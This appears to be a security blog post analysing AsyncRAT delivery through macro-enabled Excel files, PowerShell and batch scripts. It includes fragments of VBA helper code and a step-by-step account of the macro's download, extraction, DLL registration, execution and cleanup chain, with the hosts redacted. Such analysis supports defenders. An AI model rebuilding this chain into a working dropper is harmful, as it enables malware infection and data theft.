AsyncRAT: A Deep Dive into XLSM and Script-Based Cyber Attack Techniques

AsyncRAT, a Remote Access Trojan (RAT), originally developed as a legitimate open-source remote administration tool, has been extensively exploited by attackers for malicious purposes. Recent campaigns underscore its versatility in enabling data theft, remote command execution, and system compromise, posing significant threats to system security.

Here are some recent real world examples of AsyncRAT attacks:

AsyncRAT has been actively used in global cyberattacks from 2023 to 2025, targeting countries like the US, India, Brazil, and Germany. Attackers exploited phishing emails and malicious file attachments to deploy the malware. It enabled remote access, data theft, and surveillance across various sectors.

Phishing Emails with Dropbox Links: In a recent campaign, attackers used phishing emails containing Dropbox URLs to distribute AsyncRAT payloads. The infection chain included multiple stages, starting with LNK, JavaScript, and BAT files, which ultimately deployed an obfuscated AsyncRAT payload. Trusted platforms like Dropbox and TryCloudflare were exploited to avoid detection.

Stealthy Malware Delivery via Python and TryCloudflare: Another notable campaign employed Python-based payloads and TryCloudflare tunnels for covert distribution. It began with phishing emails leading victims to a ZIP file containing malicious files. These files triggered a sequence of actions that resulted in the deployment of AsyncRAT and additional malware strains.

In one campaign, phishing emails containing Dropbox URLs were used to initiate a multi-step infection chain involving LNK, PowerShell Script, and BAT files to deliver an obfuscated AsyncRAT payload. Attackers have also utilized trusted platforms like Dropbox and TryCloudflare to evade detection. Another campaign, dubbed Desert Dexter, demonstrated advanced techniques such as anti-sandbox measures to bypass security research environments, highlighting the increasing sophistication of AsyncRAT attacks.

Infection Chain:

Infection Method 1: Distribution through XLSM Macros

Cybercriminals are now embedding AsyncRAT in macro-enabled Excel spreadsheets (.xlsm), which are delivered through phishing emails posing as legitimate documents such as invoices, tax statements, or business proposals. Once the file is opened, users are urged to "Enable Content," unknowingly activating malicious macros that silently execute commands to download and install AsyncRAT.

Why XLSM Files?

• Evades Detection: XLSM files often slip past standard email security filters.

• Appears Legitimate: Macros are still common in business processes, raising less suspicion.

• Stealthy Execution: The malware runs in the background without alerting the user, ensuring persistence.

Embedded VBA Modules Function:

Private Function Get7ZipPath() As String
If Dir("C:\Program Files\7-Zip\7z.exe") <> "" Then
Get7ZipPath = "C:\Program Files\7-Zip\7z.exe"
ElseIf Dir("C:\Program Files (x86)\7-Zip\7z.exe") <> "" Then
Get7ZipPath = "C:\Program Files (x86)\7-Zip\7z.exe"
Else

Get7ZipPath = ""
End If
End Function

Private Function DecodeBase64(base64 As String) As Byte()
Dim xmlDoc As Object, node As Object
Set xmlDoc = CreateObject("MSXML2.DOMDocument")
Set node = xmlDoc.createElement("b64")
node.DataType = "bin.base64"
node.Text = base64

DecodeBase64 = node.nodeTypedValue
End Function

The malicious VBA code embedded within the Excel workbook is composed of multiple coordinated modules. Upon opening the document and enabling macros, the execution chain is initiated.

Step 1: Macro Activation and Entry Point

• The macro checks whether macros are enabled.

• If confirmed, it invokes the ViewInvoiceOnline subroutine.

Step 2: Dependency Check and 7-Zip Installation

• The subroutine checks if 7-Zip is installed on the system.

  If missing, it:

• Downloads a base64-encoded 7-Zip installer from https://xxxx.com/7z.txt.

• Decodes the file and saves it as 7zip_installer.exe in the temporary directory.

• Executes the installer silently.

Step 3: Malicious Payload Retrieval

• The macro proceeds to download a ZIP archive:

• https://xxxxx.com/file/newuploavir/newpoveno.zip

• The file is saved to the same temporary directory.

Step 4: Archive Extraction

• The ZIP file is extracted using 7-Zip with a hardcoded password 123456.

• The archive is expected to contain:

• DLLs: libcares-2.dll, msvcp290.dll, nasrallah_x86.dll, vcruntime210.dll

• Executable: newpoveno.exe

Step 5: Environment Manipulation & Execution

• The temporary folder is added to the system’s PATH environment variable.

• The script attempts to register libcares-2.dll using regsvr32.exe.

• Then, it executes newpoveno.exe with the temporary directory set as its working directory.

Step 6: Logging and Cleanup

• Execution details are logged in invoice_log.txt, located in the user’s temporary directory.

• After execution, the script attempts to delete the temporary directory and its contents to evade forensic analysis.

Infection Method 2: Distribution through PowerShell (.ps1) Scripts

PowerShell remains a favored tool for attackers to deploy AsyncRAT using obfuscated .ps1 scripts. These scripts are delivered via phishing links or embedded in document macros. Upon execution, they download the payload directly into memory, making it difficult for traditional antivirus solutions to detect.

Why PowerShell?

• Fileless execution helps avoid leaving traces on disk.

• Bypasses many defenses due to use of legitimate system tools.

• Highly customizable, enabling complex attack chains.

In the PowerShell variant, victims are typically enticed through phishing emails or deceptive websites to click on malicious links or download files masquerading as legitimate tools such as system updates, file converters, or business applications. The PowerShell script is either embedded within a dropper document or executed directly via social engineering techniques, initiating a stealthy infection chain.

Infection Method 3: Distribution through Batch (.bat) Files

Attackers also use .bat files, which are simple command-line scripts, often attached to phishing emails or dropped by other malware. When run, they execute a series of commands to retrieve and launch AsyncRAT, frequently in combination with PowerShell or curl commands.

Why Batch Files?

• Lightweight and easy to deploy in phishing campaigns.

• Triggers multi-stage infections, including script-based payloads.

• Compatible with most Windows environments, ensuring broad reach.

The Batch file (.bat) variant is commonly observed in simpler or multi-stage attacks, particularly in less sophisticated phishing campaigns. These batch files function as initial launchers, designed to invoke PowerShell scripts or fetch remote payloads, effectively acting as a bridge between the delivery mechanism and the full malware deployment.

Conclusion:

In conclusion, the AsyncRAT campaign showcases a multi-vector approach using XLSM files, PowerShell scripts, and batch files to deliver and execute malware. Its infection chain is carefully crafted to evade detection through trusted file formats and silent execution techniques. The use of tools like 7-Zip and regsvr32 adds to its stealth. Defending against such threats requires strong macro policies, script restrictions, and user awareness. A layered security strategy is essential to detect and disrupt these attacks.

The hunt doesn’t stop here, Stay tuned for more!!